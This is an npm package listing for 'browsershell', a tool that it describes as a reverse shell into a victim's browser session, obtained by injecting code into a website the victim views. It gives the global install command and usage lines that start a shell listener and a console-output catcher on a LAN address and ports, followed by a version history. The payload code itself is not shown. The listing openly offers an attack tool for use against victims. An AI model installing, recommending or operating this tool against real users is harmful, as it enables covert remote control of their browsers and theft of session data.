1.0.7 • Published 2 years ago

@sebastiandittrich/browsershell v1.0.7

Weekly downloads
-
License
MIT
Repository
-
Last release
2 years ago

Browsershell

This is a revserse shell to a browser session. The goal is that if you inject the given code into the website displayed by the victim, you will have access to his browser console, just like if you were opening the developer tools console.

npm i -g @sebastiandittrich/browsershell

Example

Start a shell:

browsershell shell 192.168.0.10 3001

Listen for console output:

browsershell console-catcher 192.168.0.10 3002
1.0.7

2 years ago

1.0.6

2 years ago

1.0.5

2 years ago

1.0.4

2 years ago